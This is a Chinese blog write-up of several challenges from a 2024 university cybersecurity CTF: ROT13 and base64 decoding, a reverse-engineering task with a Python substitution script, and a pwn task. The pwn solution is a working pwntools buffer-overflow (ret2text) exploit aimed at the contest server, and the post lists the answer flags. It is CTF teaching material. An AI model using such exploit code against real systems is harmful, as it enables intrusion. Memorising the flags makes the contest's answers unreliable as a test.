• 2024高校网络安全管理运维赛题目--复现+题目+wp


    比赛官网

    比赛官网

    部分writeup

    Signin
    如图所示GIF提取,然后简单的ROT13
    flag{welcome-to-signin-quiz}

    邮件
    ----如图所示简单的base64

    邮件flag{WeLCoMeto}

    邮箱flag{phishHUntInG}

    Babyre
    解析:放到IDA分析,看伪代码

    得到AncsA6gXMSMoMqIuNCMuxaYuAGIavC9=关键字符转
    分析得到是类似base64的加密但又不完全是
    写python代码对关键字符串处理,

    def reverse_alnum(input_str):
        result = []
        for char in input_str:
            if char.isalpha():
                # 大写字母A-Z替换为Z-A
                if char.isupper():
                    result.append(chr(90 - (ord(char) - 65)))
                # 小写字母a-z替换为z-a
                else:
                    result.append(chr(122 - (ord(char) - 97)))
            elif char.isdigit():
                # 数字1-9替换为9-1
                if char != '0':
                    result.append(str(9 - int(char) + 1))
                else:
                    result.append('0')  # 0保持不变
            else:
                # 非字母数字字符保持不变
                result.append(char)
        return ''.join(result)
    
    # 示例
    input_str = input("请输入一个包含英文字符和数字的字符串:")
    output_str = reverse_alnum(input_str)
    print("替换后的字符串为:", output_str)
    

    最后base64解密
    答案flag{B4se64_1s_s0_e4sy}

    在这里插入图片描述

    Pwn
    解释:看代码呀
    构造输入的内容溢出然后ret到后门函数(简单的ret2text)
    答案:flag{kOoD1EijiemeePh8IeNei2XOL8ich5de}

    from pwn import *
    #context(os='linux',arch='amd64',log_level='debug')
    #p=process('./pwn')
    elf=ELF('./pwn')
    libc = ELF('libc.so.6')
    p=remote("prob07.contest.pku.edu.cn",10007)
    #gdb.attach(p, 'b *0x40121d')
    
    bin_sh_address_chuancan=0x40117a
    
    
    ret = 0x40121e
    
    offset=0x78
    
    payload1=b'31:MEQCIHOFrdjB9js6X862TKy0BVBCbHCJyY9DFzfczTllh8GuAiA7m5orfJ0SRZt6xI_ZEE__jRp8V9V8YIP13k61RG9quw=='
    p.sendline(payload1)
    
    payload2=b'a'*offset + p64(bin_sh_address_chuancan)
    p.sendlineafter(b'Enter your username: ',payload2)
    p.sendline(payload2)
    #pause()
    p.interactive()
    

    在这里插入图片描述Gateway解析:
    找到这个文件 ,十进制的ASCII的转换
    答案:flag{ad1985868133e8cf1828cb84adbe5a5b}
    在这里插入图片描述

    题目资源

    题目资源

    有时间我再自己完全的做一遍,未完待续~

    答案当然是要最后看哒:

    官方writeup
    集思广益
    比较好的备份

  • 相关阅读:
    第01章 Web应用概述
    semodule工具详解(1)
    Netty 之 NioEventLoop 源码阅读
    再学Blazor——组件
    如何利用低代码做好系统整合,实现企业统一管理?
    特征值和特征向量(3Blue1Brown学习笔记)
    elementui el-tree回显多个节点高亮
    正则表达式
    ExposureDiffusion: Learning to Expose for Low-light Image Enhancement论文阅读笔记
    JAVA基础(三十二)——反射之创建对象
  • 原文地址:https://blog.csdn.net/m0_64696290/article/details/139597887